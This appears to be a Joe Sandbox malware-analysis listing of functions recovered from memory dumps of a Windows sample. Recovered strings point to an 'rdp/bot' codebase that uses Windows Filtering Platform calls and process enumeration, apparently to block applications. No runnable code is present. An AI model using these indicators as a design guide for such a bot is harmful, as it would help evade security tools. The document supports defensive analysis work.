                  • Opcode ID: a7db43b5a7dd92ac6232257caf0c21fec7302e7fa8c733100f6bb5046820c587
                  • Instruction ID: b3a8a882649535250f77d3c6dc5267fb00df151e7a676f347dbe37ebf8f25962
                  • Opcode Fuzzy Hash: a7db43b5a7dd92ac6232257caf0c21fec7302e7fa8c733100f6bb5046820c587
                  • Instruction Fuzzy Hash: BB41FAA1A08647D1FE20BF56E9807B4E2A0FF40348FD85137DA0E1AB91DE7CE945C760

                  Control-flow Graph

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: _errno
                  • String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtoul failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint32
                  • API String ID: 2918714741-1670302297
                  • Opcode ID: 51c7bf59d24ef80073534a75ab36317efd70ee14cd23d71745753a06ee0d1032
                  • Instruction ID: 83fe706df551c381aa921d422c82564dc486d6326dd34941ada22cbef21ce387
                  • Opcode Fuzzy Hash: 51c7bf59d24ef80073534a75ab36317efd70ee14cd23d71745753a06ee0d1032
                  • Instruction Fuzzy Hash: AF214F62A08A46D6EB21EF16F8807AAB760FB84784F845137EE4C47754DF3DE945CB20

                  Control-flow Graph

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
                  • String ID: .$1
                  • API String ID: 513531256-1839485796
                  • Opcode ID: 32402bb36cf6c4058c43ba99a49dc3a81660aa1839c62e2d7fd324598b5362bd
                  • Instruction ID: 6bf4113b69e841575db69034cce4a7c04fbad56eb94b350c24bb3f43eeecb274
                  • Opcode Fuzzy Hash: 32402bb36cf6c4058c43ba99a49dc3a81660aa1839c62e2d7fd324598b5362bd
                  • Instruction Fuzzy Hash: F9416125A0C641C6FB20BF17E8907BAA690BB89784FC44136D90D47796DF2DE581CB60

                  Control-flow Graph

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: DestroyEnumFwpmHandle0Providerwcscmp
                  • String ID: [E] (%s) -> FwpmProviderAdd0 failed(res=%08lx)$[E] (%s) -> FwpmProviderCreateEnumHandle0 failed(res=%08lx)$[E] (%s) -> FwpmProviderEnum0 failed(res=%08lx)$setup_filt_prov
                  • API String ID: 1522850966-2029202777
                  • Opcode ID: b84bd1504df7614f6630813681ba61713a050ef6a538e12cd96e288b6b783d6a
                  • Instruction ID: b052006e5bf96002e4086e8aff6ecc89db84d04b957a9d9e29fe3300a7c75d01
                  • Opcode Fuzzy Hash: b84bd1504df7614f6630813681ba61713a050ef6a538e12cd96e288b6b783d6a
                  • Instruction Fuzzy Hash: C8519335619B82C5FB30AF16F4803AAA3A6FB80784F409136DA8D47B59EF3DD440CB90
                  APIs
                  • FwpmEngineClose0.FWPUCLNT(?,?,?,?,?,?,00000000,0000023B627E14D0,?,00007FF764CC14B4,?,?,00000001,00007FF764CC14D2), ref: 00007FF764CC9701
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: Close0EngineFwpmwcscmp
                  • String ID: [E] (%s) -> FwpmEngineOpen0 failed(res=%08lx)$app$ip4$svc$wfp_block
                  • API String ID: 4239307310-774261742
                  • Opcode ID: 1779572da26f08be6a49a7d3c2c20cf19122b058afad2e1e1c3b112107f5d3a9
                  • Instruction ID: b2ff03af516dc354d540ec3966b4a4bfca50217e53e43ff9949e10ff4e5a0af5
                  • Opcode Fuzzy Hash: 1779572da26f08be6a49a7d3c2c20cf19122b058afad2e1e1c3b112107f5d3a9
                  • Instruction Fuzzy Hash: 0B318F51B1C643C1FA70BF6BA5D02BA92519F497C8FD02033EA4E8B7D5EE5CD8458B60
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: AttributesErrorFileLast
                  • String ID: (path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_path_exists
                  • API String ID: 1799206407-4111913120
                  • Opcode ID: f857fc96a45243b8d675c7de72616403e7cd54f327aa169ba606177cfb7c0d27
                  • Instruction ID: d7f0cca7ea840d3e24cd42ee70215aded4bebc4d652bf43b60250956aff70fe4
                  • Opcode Fuzzy Hash: f857fc96a45243b8d675c7de72616403e7cd54f327aa169ba606177cfb7c0d27
                  • Instruction Fuzzy Hash: C521A350F0CC83C2FB30EF6A96C4379A2405F5070AFE47533E10E8A798DE1CE8859A66
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: AddressErrorLastProcfflushfwrite
                  • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
                  • API String ID: 1224403792-3063791425
                  • Opcode ID: b272c91321a469efff73e5e126942c115d99d642664b1a9ab91995e88760635f
                  • Instruction ID: f17e94393856e5ba8388d2afc91738ab39bfb1e260acd81733404160379509db
                  • Opcode Fuzzy Hash: b272c91321a469efff73e5e126942c115d99d642664b1a9ab91995e88760635f
                  • Instruction Fuzzy Hash: 9FF08CA0A08603C2FE61AF5BA8905F5E6516F04BD0F988433EC4C0B794EE2CE946CB20
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: CloseErrorHandleLastNextProcess32
                  • String ID: [E] (%s) -> Process32Next failed(gle=%lu)$block_app
                  • API String ID: 1692733154-1215713629
                  • Opcode ID: 0844c597dbd8a6f5ee97e7fbdf74e2f9312bd5830c43fa9e4d981874f003747c
                  • Instruction ID: 107cbe6e8add916c316ed32672a64bd99c185d603e92d867b0bcccc0f55bcb16
                  • Opcode Fuzzy Hash: 0844c597dbd8a6f5ee97e7fbdf74e2f9312bd5830c43fa9e4d981874f003747c
                  • Instruction Fuzzy Hash: BCF0F991A0CA03C5FE347F1B98D457A9691AF45746FD06833C40E86395EE2CE945CB34
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: CloseErrorHandleLastNextProcess32
                  • String ID: [E] (%s) -> Process32Next failed(gle=%lu)$block_app
                  • API String ID: 1692733154-1215713629
                  • Opcode ID: f0cf56fa59122cdf6f35d599a095bde5a8af241929c9135850f50687308cf45f
                  • Instruction ID: 8f410d75fe55aea4b37b42ffa541c8063bce4bf20ad01d3014a7c4b1fdf92a4c
                  • Opcode Fuzzy Hash: f0cf56fa59122cdf6f35d599a095bde5a8af241929c9135850f50687308cf45f
                  • Instruction Fuzzy Hash: CDF0F991A0CA03C5FE347F1B98D457A9691AF45746FD06833C40E86395EE2CE945CB34
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: CloseErrorHandleLastNextProcess32
                  • String ID: [E] (%s) -> Process32Next failed(gle=%lu)$block_app
                  • API String ID: 1692733154-1215713629
                  • Opcode ID: 8c583b02844f7365fe10fdef02dd7f147e5953e646258f17a39fa72fb5aca8cc
                  • Instruction ID: 7a4578d28f008a209aa9dc6a21998f35055b735e4f448f3200de48c03eb4bc2c
                  • Opcode Fuzzy Hash: 8c583b02844f7365fe10fdef02dd7f147e5953e646258f17a39fa72fb5aca8cc
                  • Instruction Fuzzy Hash: CFF0F995A0CA03C5FE347F1B98D457A9691AF45746FD06833C40E86395EE2CE945CB34
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: CloseErrorHandleLastNextProcess32
                  • String ID: [E] (%s) -> Process32Next failed(gle=%lu)$block_app
                  • API String ID: 1692733154-1215713629
                  • Opcode ID: 8ede226555eb87350e4d9812cf06a02a45475cc6dcbef2c2e6915899342c15b3
                  • Instruction ID: a1bc34ba86044469ac545c78af7792dba010ab768f64896d9103be36783fed3a
                  • Opcode Fuzzy Hash: 8ede226555eb87350e4d9812cf06a02a45475cc6dcbef2c2e6915899342c15b3
                  • Instruction Fuzzy Hash: 1EF0F991A0CA03C5FF347F1B98D457A9691AF45746FD06833C44E86395EE2CE945CB34
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: ErrorLastLibraryLoadfflushfwrite
                  • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
                  • API String ID: 4085810780-3386190286
                  • Opcode ID: 838ab5ad81db8fa0c9906e020a469101170339cfb8dec6f9f79846ce8c234f0c
                  • Instruction ID: b8beedf40af9b67e5e609be1934415407869410d96de01ed45ecce8b57025457
                  • Opcode Fuzzy Hash: 838ab5ad81db8fa0c9906e020a469101170339cfb8dec6f9f79846ce8c234f0c
                  • Instruction Fuzzy Hash: E8F05E10E0A607C0FD61BF5BA8D05F0A6516F18B94FC86033CC0D17751FD1CA986CB20
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: fclose
                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                  • API String ID: 3125558077-1073242539
                  • Opcode ID: 555a60bbb94d8f11b84c7586d42656cd9d74e5fddd554d03be3b7fe2876d5776
                  • Instruction ID: a1ec64a3060b2f7715f7278177b47906e5361ecf9de66f769aa4b4d5858c0cf3
                  • Opcode Fuzzy Hash: 555a60bbb94d8f11b84c7586d42656cd9d74e5fddd554d03be3b7fe2876d5776
                  • Instruction Fuzzy Hash: EAF05E13B08A0381F972BE0BB9D07B9D2412F81765EC995378D5C0ABD1EE3DA883C624
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: fclose
                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                  • API String ID: 3125558077-1073242539
                  • Opcode ID: 7d89000f18e3ae9476e553b0de7a4799fa8d7fb19bfebcc332b22eb6a145fdd9
                  • Instruction ID: 368cca5a53d4d506b5b9a5e7d9fc27b524a65b927eadc9adf09a672daab8df07
                  • Opcode Fuzzy Hash: 7d89000f18e3ae9476e553b0de7a4799fa8d7fb19bfebcc332b22eb6a145fdd9
                  • Instruction Fuzzy Hash: 0DF05E13B08A03C1F972BE0BB9D07B992412F81765EC99537CD5C0A7D1EE3DA883C624
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: fclose
                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                  • API String ID: 3125558077-1073242539
                  • Opcode ID: dea5dcb61242e3e3a50e5aadecfd36630c6c5b2ccdb5808b774e88059a5fe563
                  • Instruction ID: 2afabbb282ea2a9b0c1c72107c900aa32e6b6e194a0ca9386b7b663af36bb1bd
                  • Opcode Fuzzy Hash: dea5dcb61242e3e3a50e5aadecfd36630c6c5b2ccdb5808b774e88059a5fe563
                  • Instruction Fuzzy Hash: 52F05E13B08A0381F972BE0BB9D17B992412F81765EC995378D5C0B7D1EE3DA883C624
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: fclose
                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                  • API String ID: 3125558077-1073242539
                  • Opcode ID: db1394cb5d040a0732b129c8b882a0ded0419c026b03aa289372004f6f859cb5
                  • Instruction ID: a6267ff4d29a2a2f4cfaf063ff864935e7f83a5909f29d36a9c409f436961634
                  • Opcode Fuzzy Hash: db1394cb5d040a0732b129c8b882a0ded0419c026b03aa289372004f6f859cb5
                  • Instruction Fuzzy Hash: E4F05E13B08A0781F972BE0BB9D07B992412F81765EC995378D5C0A7D1EE3DA883C624
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: fclose
                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                  • API String ID: 3125558077-1073242539
                  • Opcode ID: 15d988275bd6a77afbdd860917dce8ee6ec7a0012be1500b13c403767ccb94a5
                  • Instruction ID: 425d62ac2a78b4f102df9f273988b8e795a1de69fbb95806e175e3d1e26f67f3
                  • Opcode Fuzzy Hash: 15d988275bd6a77afbdd860917dce8ee6ec7a0012be1500b13c403767ccb94a5
                  • Instruction Fuzzy Hash: F8F05E13B08A0381F972BE0BB9D07B992412F81765EC995378D5C0A7D1EE3DA883C624
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: fclose
                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                  • API String ID: 3125558077-1073242539
                  • Opcode ID: 17849adbd24b951f4aeb0e148422a47da2da14e58c0ef747395e598f3a492db1
                  • Instruction ID: 4a05fdafed7e73f30e254f738c5bf47c04118800ba140e6ff2ba3c3a9247edb0
                  • Opcode Fuzzy Hash: 17849adbd24b951f4aeb0e148422a47da2da14e58c0ef747395e598f3a492db1
                  • Instruction Fuzzy Hash: 7CF05E13B08A0381F973BE0BB9D07B992412F81765EC995378D5C0A7D1EE3DA883C624
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
